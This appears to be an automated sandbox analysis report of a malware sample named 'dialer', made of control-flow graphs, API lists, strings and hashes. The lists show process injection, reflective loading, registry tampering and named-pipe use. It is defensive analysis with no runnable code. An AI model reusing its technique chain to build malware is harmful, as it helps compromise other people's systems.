                                                                                                      control_flow_graph 199 7ff744dd26e8-7ff744dd2710 200 7ff744dd2716 199->200 201 7ff744dd28be-7ff744dd28c6 199->201 202 7ff744dd271c-7ff744dd2723 200->202 203 7ff744dd284a-7ff744dd2882 GetProcessHeap HeapAlloc K32EnumProcesses 200->203 204 7ff744dd28cc-7ff744dd28cf 201->204 205 7ff744dd2b0a-7ff744dd2b2e ReadFile 201->205 209 7ff744dd2841-7ff744dd2843 ExitProcess 202->209 210 7ff744dd2729-7ff744dd272c 202->210 206 7ff744dd2c00-7ff744dd2c16 203->206 207 7ff744dd2888-7ff744dd2899 203->207 211 7ff744dd28d5-7ff744dd28da 204->211 212 7ff744dd2b00-7ff744dd2b05 call 7ff744dd1768 204->212 205->206 208 7ff744dd2b34-7ff744dd2b3b 205->208 207->206 216 7ff744dd289f-7ff744dd28b7 call 7ff744dd10c0 207->216 208->206 217 7ff744dd2b41-7ff744dd2b55 call 7ff744dd19ac 208->217 218 7ff744dd27e4-7ff744dd280f RegOpenKeyExW 210->218 219 7ff744dd2732-7ff744dd2735 210->219 213 7ff744dd2aa5-7ff744dd2ab8 call 7ff744dd1a44 211->213 214 7ff744dd28e0-7ff744dd28e3 211->214 212->206 213->206 238 7ff744dd2abe-7ff744dd2acd call 7ff744dd1a44 213->238 220 7ff744dd28e5-7ff744dd28ea 214->220 221 7ff744dd2921-7ff744dd2932 call 7ff744dd1a44 214->221 241 7ff744dd28b9 216->241 217->206 242 7ff744dd2b5b-7ff744dd2b61 217->242 225 7ff744dd2825-7ff744dd283c call 7ff744dd1ac4 call 7ff744dd1768 call 7ff744dd1000 call 7ff744dd17f8 218->225 226 7ff744dd2811-7ff744dd281f RegDeleteValueW 218->226 227 7ff744dd27d5-7ff744dd27df 219->227 228 7ff744dd273b-7ff744dd273e 219->228 220->206 231 7ff744dd28f0-7ff744dd291a call 7ff744dd1958 call 7ff744dd1984 ExitProcess 220->231 221->206 249 7ff744dd2938-7ff744dd295a ReadFile 221->249 225->206 226->225 227->206 236 7ff744dd2744-7ff744dd2749 228->236 237 7ff744dd27c8-7ff744dd27d0 228->237 236->206 244 7ff744dd274f-7ff744dd2773 ReadFile 236->244 237->206 238->206 262 7ff744dd2ad3-7ff744dd2afb ShellExecuteW 238->262 241->206 250 7ff744dd2beb 242->250 251 7ff744dd2b67-7ff744dd2ba2 GetProcessHeap HeapAlloc call 7ff744dd14e4 242->251 244->206 246 7ff744dd2779-7ff744dd2780 244->246 246->206 253 7ff744dd2786-7ff744dd279a call 7ff744dd19ac 246->253 249->206 256 7ff744dd2960-7ff744dd2967 249->256 257 7ff744dd2bf2-7ff744dd2bfb call 7ff744dd2c18 250->257 266 7ff744dd2ba4-7ff744dd2baa 251->266 267 7ff744dd2bd5-7ff744dd2bdb GetProcessHeap 251->267 253->206 274 7ff744dd27a0-7ff744dd27a6 253->274 256->206 264 7ff744dd296d-7ff744dd29ab GetProcessHeap HeapAlloc ReadFile 256->264 257->206 262->206 270 7ff744dd29b1-7ff744dd29bd 264->270 271 7ff744dd2a97-7ff744dd2aa0 GetProcessHeap 264->271 266->267 272 7ff744dd2bac-7ff744dd2bbe 266->272 275 7ff744dd2bde-7ff744dd2be9 HeapFree 267->275 270->271 276 7ff744dd29c3-7ff744dd29cf 270->276 271->275 277 7ff744dd2bc4-7ff744dd2bcc 272->277 278 7ff744dd2bc0-7ff744dd2bc2 272->278 280 7ff744dd27bc-7ff744dd27c3 274->280 281 7ff744dd27a8-7ff744dd27b7 call 7ff744dd10c0 274->281 275->206 276->271 282 7ff744dd29d5-7ff744dd29e0 276->282 277->267 286 7ff744dd2bce 277->286 278->277 285 7ff744dd2bd0 call 7ff744dd16d8 278->285 280->257 281->206 283 7ff744dd2a05-7ff744dd2a91 lstrlenW GetProcessHeap HeapAlloc call 7ff744dd18b8 * 3 call 7ff744dd2c18 GetProcessHeap HeapFree 282->283 284 7ff744dd29e2-7ff744dd29ed 282->284 283->271 284->271 288 7ff744dd29f3-7ff744dd2a00 call 7ff744dd1db4 284->288 285->267 286->272 288->271
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                                      • String ID: SOFTWARE$dialerstager$open
                                                                                                      • API String ID: 3276259517-3931493855
                                                                                                      • Opcode ID: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
                                                                                                      • Instruction ID: 0f3164331afaba38148bf996b05f78796f86f0e9c3220a83185cd369206af037
                                                                                                      • Opcode Fuzzy Hash: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
                                                                                                      • Instruction Fuzzy Hash: DDD162A1A0C682C6FF75BF2698842F8E2A5FF44744F814135DF2D4669DDE7CA604EB20

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3462610200-2766056989
                                                                                                      • Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                                                                                      • Instruction ID: 9cb7e40158daf206b3304f30d658526d57e609201b02fbaae6ff521b849d784f
                                                                                                      • Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                                                                                      • Instruction Fuzzy Hash: 71618BB2B08A02C6EB54AF66E88066DB7A1FB48B88F804135DF5D57B58DF3CE445DB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                      • String ID: dialersvc64
                                                                                                      • API String ID: 4184240511-3881820561
                                                                                                      • Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                                                                                      • Instruction ID: 0c03f8efc8a49175dc3be8dedb78db821271f0a9f51ed1e9062ce521a9487c62
                                                                                                      • Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                                                                                      • Instruction Fuzzy Hash: D4415E72B08B46D6EB10AF26D8842ADB7B5FB89B89B444135DF1D47A28DF3CE149C710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Delete$CloseEnumOpen
                                                                                                      • String ID: SOFTWARE\dialerconfig
                                                                                                      • API String ID: 3013565938-461861421
                                                                                                      • Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                                                                                      • Instruction ID: 6f78f3f51b98cfd89397fafc664e0b23e20c9be6866b05c0db313a30545d2b5c
                                                                                                      • Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                                                                                      • Instruction Fuzzy Hash: 53118662B1CA85C1EB60BF25E8847B96364FB48758F804235DB5D0659CCF3CD148DF24
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Write$CloseCreateHandle
                                                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                      • API String ID: 148219782-3440882674
                                                                                                      • Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                                                                                      • Instruction ID: 10a480eaf909f46ed61b80a6c448e0b6d92d6f2dc317337959db4e043651fb05
                                                                                                      • Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                                                                                      • Instruction Fuzzy Hash: 131151B6B1875182FB10AF16E448329E760FB88BA4F844235DF2903B98CF7CD505CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true
                                                                                                      • Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: ntdll.dll
                                                                                                      • API String ID: 1646373207-2227199552
                                                                                                      • Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                                                                                      • Instruction ID: 278d3e32d034f16ee11d6845583e37071438015513df5d0ed7226aacab1b85e9
                                                                                                      • Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                                                                                      • Instruction Fuzzy Hash: 3BD0C9D4F1E603C2EE19BFA7A8D51749395AF5CB85BC85430CE3E46358DE2CD0999A20
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PXqZ$VqZ
                                                                                                      • API String ID: 0-3993013737
                                                                                                      • Opcode ID: 58bfeecae3f7c405cf263628f8d62d2de318c4ae5d08fdb4d2e8bc698b059fce
                                                                                                      • Instruction ID: 07ab21f1c06643f76439a7c930ba2349c66bc48b0aa4e6e151ede48611b7eb15
                                                                                                      • Opcode Fuzzy Hash: 58bfeecae3f7c405cf263628f8d62d2de318c4ae5d08fdb4d2e8bc698b059fce
                                                                                                      • Instruction Fuzzy Hash: 5802C031A0CA4A8FEB94EF5CD485EFD7BE1EF95320F1801BAD109D7186DA75B8468780
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11649541546.00007FF95A600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A600000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a600000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f44bb0a59ae3957238f6a35258bdbf185853a948c520ef791124e059f34e5ec3
                                                                                                      • Instruction ID: 5403e9505965d97f5e0262de74fb0ea32267da95d17a1bbcfa12b68641c46fd9
                                                                                                      • Opcode Fuzzy Hash: f44bb0a59ae3957238f6a35258bdbf185853a948c520ef791124e059f34e5ec3
                                                                                                      • Instruction Fuzzy Hash: 6951FF32E0DA460FEBA5DB1C94553B477D1FF84620B4801FAC24EC329BDE65F885828D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e6a8a1fccee84567f5f1b73f216121859378956d93cd49f92dca775da29cc5bd
                                                                                                      • Instruction ID: fccf516aed1cb3f197c4936c56eee5cc9a493339fe7aa5635168a4a8b84b7cd5
                                                                                                      • Opcode Fuzzy Hash: e6a8a1fccee84567f5f1b73f216121859378956d93cd49f92dca775da29cc5bd
                                                                                                      • Instruction Fuzzy Hash: D831283191CB884FDB58DF5CA84A6A87BE0FB99320F00426FE449D3252DB71A855CBC2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11647775829.00007FF95A41D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A41D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a41d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5213a1fb0b77da9404c5d0b26b6f3acd8c5d12e5f4aa8bcbe00184c14cdd790e
                                                                                                      • Instruction ID: 242b0196b6af598dc269ecb840ca75ef550a1181fd226c2f0402cd46171f90f6
                                                                                                      • Opcode Fuzzy Hash: 5213a1fb0b77da9404c5d0b26b6f3acd8c5d12e5f4aa8bcbe00184c14cdd790e
                                                                                                      • Instruction Fuzzy Hash: A141E73040DBC45FD756DB299C46A623FF0EF67220F1945DFD088CB1A3D625A846C792
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f44e2c50f57d475d311a47254c423f40713acfc3e612fd4b96531b42f44eb877
                                                                                                      • Instruction ID: 0e2488b65edb031550ab5b0545e24fa46b68cfb221c9239526a539f3d101aed8
                                                                                                      • Opcode Fuzzy Hash: f44e2c50f57d475d311a47254c423f40713acfc3e612fd4b96531b42f44eb877
                                                                                                      • Instruction Fuzzy Hash: 9021073190CB4C4FDB59DFAC984A7E97BE0EB96321F04826FD04CC3152DA75A45ACB92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11649541546.00007FF95A600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A600000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a600000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c4325a5498a51c5dcb6f60cf2f8ea4543726232defd922a327934a1363739fee
                                                                                                      • Instruction ID: ac9b0055e7b541a4f9f992143f792522413ffc0b335ae97318a1e4ae2a56b1c3
                                                                                                      • Opcode Fuzzy Hash: c4325a5498a51c5dcb6f60cf2f8ea4543726232defd922a327934a1363739fee
                                                                                                      • Instruction Fuzzy Hash: 95219A22E0EA464FE7B5DB0C949827427D1FF55720B4901FAC24EC71AADE59FC84824D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5d3de781b6e1c1d351980934f9f8787e9cc24ca28914612d81c9f729411c0c92
                                                                                                      • Instruction ID: 37b9fecd97e1dd0952008476a72b52ab80cc2f8e6d43ceb0f53cc3092a2286e0
                                                                                                      • Opcode Fuzzy Hash: 5d3de781b6e1c1d351980934f9f8787e9cc24ca28914612d81c9f729411c0c92
                                                                                                      • Instruction Fuzzy Hash: BA01677111CB0C4FD744EF4CE451AA9B7E0FF95364F10056EE58AC3652D636E882CB45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2d7eaf97ccc90420df6056668d0ccdd822ba2c8bb23feb9e3087e9ce3483ee94
                                                                                                      • Instruction ID: a02a55745e7160683888cff8399c82daa4ab72313aebfbe9638df90908e34b44
                                                                                                      • Opcode Fuzzy Hash: 2d7eaf97ccc90420df6056668d0ccdd822ba2c8bb23feb9e3087e9ce3483ee94
                                                                                                      • Instruction Fuzzy Hash: B3F02B3180C6898FDB06DF2898159D97FE0FF56211B0402E7D458C70B2DB66A459C782
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11649541546.00007FF95A600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A600000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a600000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 93d94394b23c0cba90b620331d936518d77ac6f979c7e0ce369d9e4703d3c0a7
                                                                                                      • Instruction ID: de399176101e68a01690bdc534d5f5509339090d8948d5a3321e098aa83244f0
                                                                                                      • Opcode Fuzzy Hash: 93d94394b23c0cba90b620331d936518d77ac6f979c7e0ce369d9e4703d3c0a7
                                                                                                      • Instruction Fuzzy Hash: 65F01D31A0D5458FD764EB4CE4856A877E0FF45721B1500F6D24EC7563DA66BC508748
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11649541546.00007FF95A600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A600000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a600000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ac88666420c9f82497ce58b9045e6db77a466a550d603a4519c7d163b9a4a1b1
                                                                                                      • Instruction ID: adbaae97a93b6b130bce2465ed0aa0ca36bb2cd4932d21e7907f1205aa78300a
                                                                                                      • Opcode Fuzzy Hash: ac88666420c9f82497ce58b9045e6db77a466a550d603a4519c7d163b9a4a1b1
                                                                                                      • Instruction Fuzzy Hash: DCF0A73131CF044FE744EE2CD845765B3D0FBA8310F10462FE44AC3351DA21E4818786
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (CyZ$0EyZ$8CyZ$HCyZ$XDyZ$AyZ
                                                                                                      • API String ID: 0-2653167220
                                                                                                      • Opcode ID: 79dcc87cfada842c5a896a50b8ebe7c1c0743aa000a97f18050aca1a95ff6741
                                                                                                      • Instruction ID: a341a80fde79020721d87952d9a24c498826000edcd45a2fb10d5030480b5143
                                                                                                      • Opcode Fuzzy Hash: 79dcc87cfada842c5a896a50b8ebe7c1c0743aa000a97f18050aca1a95ff6741
                                                                                                      • Instruction Fuzzy Hash: 8CF147D3E0E6D25FE7528F6C68A56A93FD4BFA3614B0D00F7D0C9CA093A94A78074359
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (CyZ$0EyZ$XDyZ$AyZ
                                                                                                      • API String ID: 0-417568979
                                                                                                      • Opcode ID: 04d8bf25000ca96877c1b439f088e6110670d6d2c3f8f414f50d7bdbd78bbe8c
                                                                                                      • Instruction ID: e2b647e9d132551b1f8a0e87d75a26a83fc84f2c1c785d380973d2b840cbfaf7
                                                                                                      • Opcode Fuzzy Hash: 04d8bf25000ca96877c1b439f088e6110670d6d2c3f8f414f50d7bdbd78bbe8c
                                                                                                      • Instruction Fuzzy Hash: 3F6172E7E0E5C25BE7518F5C78656B96FD0BFE3654B0C01F7C0C9C6097A88A780B429A

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1%
                                                                                                      Dynamic/Decrypted Code Coverage:94.5%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:110
                                                                                                      Total number of Limit Nodes:18
                                                                                                      execution_graph 27954 1f6c88a5dd0 27955 1f6c88a5ddd 27954->27955 27956 1f6c88a5de9 27955->27956 27964 1f6c88a5efa 27955->27964 27957 1f6c88a5e1e 27956->27957 27958 1f6c88a5e6d 27956->27958 27959 1f6c88a5e46 SetThreadContext 27957->27959 27959->27958 27960 1f6c88a5f21 VirtualProtect FlushInstructionCache 27960->27964 27961 1f6c88a5ffe 27972 1f6c88a4ed0 GetCurrentProcess 27961->27972 27962 1f6c88a5fde 27962->27961 27976 1f6c88a44c0 VirtualFree 27962->27976 27964->27960 27964->27962 27966 1f6c88a6003 27967 1f6c88a6057 27966->27967 27968 1f6c88a6017 ResumeThread 27966->27968 27977 1f6c88a7a20 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 27967->27977 27969 1f6c88a604b 27968->27969 27969->27966 27971 1f6c88a609f 27973 1f6c88a4eec 27972->27973 27974 1f6c88a4f02 VirtualProtect FlushInstructionCache 27973->27974 27975 1f6c88a4f33 27973->27975 27974->27973 27975->27966 27976->27961 27977->27971 27978 1f6c8472908 27979 1f6c8472936 27978->27979 27980 1f6c8472994 VirtualAlloc 27979->27980 27983 1f6c8472aa7 27979->27983 27981 1f6c84729b8 27980->27981 27980->27983 27982 1f6c8472a2b LoadLibraryA 27981->27982 27981->27983 27982->27981 27984 1f6c890ae0c 27985 1f6c890ae57 27984->27985 27990 1f6c890ae1b 27984->27990 27992 1f6c890b840 12 API calls 27985->27992 27987 1f6c890ae3e HeapAlloc 27988 1f6c890ae55 27987->27988 27987->27990 27990->27985 27990->27987 27991 1f6c8909d24 EnterCriticalSection LeaveCriticalSection 27990->27991 27991->27990 27992->27988 27993 1f6c88a1c28 27999 1f6c88a1650 GetProcessHeap HeapAlloc 27993->27999 27995 1f6c88a1c3e Sleep SleepEx 27997 1f6c88a1c37 27995->27997 27997->27995 27998 1f6c88a15c0 StrCmpIW StrCmpW 27997->27998 28043 1f6c88a18dc 12 API calls 27997->28043 27998->27997 28044 1f6c88a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 27999->28044 28001 1f6c88a1678 28045 1f6c88a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 28001->28045 28003 1f6c88a1689 28046 1f6c88a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 28003->28046 28005 1f6c88a1692 28047 1f6c88a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 28005->28047 28007 1f6c88a169b 28008 1f6c88a16b6 RegOpenKeyExW 28007->28008 28009 1f6c88a18ce 28008->28009 28010 1f6c88a16e8 RegOpenKeyExW 28008->28010 28009->27997 28011 1f6c88a1711 28010->28011 28012 1f6c88a1727 RegOpenKeyExW 28010->28012 28055 1f6c88a12c8 16 API calls 28011->28055 28014 1f6c88a1762 RegOpenKeyExW 28012->28014 28015 1f6c88a174b 28012->28015 28018 1f6c88a1786 28014->28018 28019 1f6c88a179d RegOpenKeyExW 28014->28019 28048 1f6c88a104c RegQueryInfoKeyW 28015->28048 28016 1f6c88a171d RegCloseKey 28016->28012 28056 1f6c88a12c8 16 API calls 28018->28056 28021 1f6c88a17c1 28019->28021 28022 1f6c88a17d8 RegOpenKeyExW 28019->28022 28057 1f6c88a12c8 16 API calls 28021->28057 28026 1f6c88a1813 RegOpenKeyExW 28022->28026 28027 1f6c88a17fc 28022->28027 28024 1f6c88a1793 RegCloseKey 28024->28019 28030 1f6c88a184e RegOpenKeyExW 28026->28030 28031 1f6c88a1837 28026->28031 28058 1f6c88a12c8 16 API calls 28027->28058 28028 1f6c88a17ce RegCloseKey 28028->28022 28034 1f6c88a1872 28030->28034 28035 1f6c88a1889 RegOpenKeyExW 28030->28035 28033 1f6c88a104c 6 API calls 28031->28033 28032 1f6c88a1809 RegCloseKey 28032->28026 28039 1f6c88a1844 RegCloseKey 28033->28039 28036 1f6c88a104c 6 API calls 28034->28036 28037 1f6c88a18c4 RegCloseKey 28035->28037 28038 1f6c88a18ad 28035->28038 28040 1f6c88a187f RegCloseKey 28036->28040 28037->28009 28041 1f6c88a104c 6 API calls 28038->28041 28039->28030 28040->28035 28042 1f6c88a18ba RegCloseKey 28041->28042 28042->28037 28044->28001 28045->28003 28046->28005 28047->28007 28049 1f6c88a11b5 RegCloseKey 28048->28049 28050 1f6c88a10b9 28048->28050 28049->28014 28050->28049 28051 1f6c88a10c7 RegEnumValueW 28050->28051 28053 1f6c88a111c 28051->28053 28052 1f6c88a1149 GetProcessHeap HeapAlloc 28052->28053 28053->28049 28053->28051 28053->28052 28054 1f6c88a117f GetProcessHeap HeapFree 28053->28054 28054->28053 28055->28016 28056->28024 28057->28028 28058->28032 28059 1f6c88a3b99 28062 1f6c88a3ae6 28059->28062 28060 1f6c88a3b50 28061 1f6c88a3b36 VirtualQuery 28061->28060 28061->28062 28062->28060 28062->28061 28063 1f6c88a3b6a VirtualAlloc 28062->28063 28063->28060 28064 1f6c88a3b9b GetLastError 28063->28064 28064->28062 28065 1f6c88a2a7c 28067 1f6c88a2ac1 28065->28067 28066 1f6c88a2b20 28067->28066 28069 1f6c88a3930 28067->28069 28070 1f6c88a3952 28069->28070 28071 1f6c88a393d StrCmpNIW 28069->28071 28070->28067 28071->28070 28072 1f6c88a562d 28074 1f6c88a5634 28072->28074 28073 1f6c88a569b 28074->28073 28075 1f6c88a5717 VirtualProtect 28074->28075 28076 1f6c88a5751 28075->28076 28077 1f6c88a5743 GetLastError 28075->28077 28077->28076 28078 1f6c88d2908 28079 1f6c88d2936 28078->28079 28080 1f6c88d2994 VirtualAlloc 